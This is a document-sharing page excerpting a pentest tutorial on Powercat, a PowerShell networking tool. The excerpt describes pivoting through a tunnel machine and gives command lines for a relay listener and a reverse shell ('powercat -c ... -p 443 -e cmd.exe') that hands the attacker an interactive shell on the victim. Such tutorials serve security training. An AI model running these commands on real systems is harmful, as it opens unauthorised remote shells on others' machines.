Skip to content

Opening book details…

About this document

Powercat: PowerShell Networking Utility by Fagner is a document available to read on EtoBox.

Ignite Attacker: raj Tunnel: tunnel Victim: victim Attacker connects to the tunnel machine: Enter-PSSession -ComputerName tunnel -Credential raj Now, we’ll set up a listener on the tunnel machine to forward traffic to the victim: powercat -l -p 443 -r 192.168.146.145 The -r flag specifies the remote IP address we want to forward traffic to. Now, the victim machine runs: powercat -c 192.168.1.145 -p 443 -e cmd.exe And on the attacker side, we get an interactive shell!

Author
Fagner
Language
EN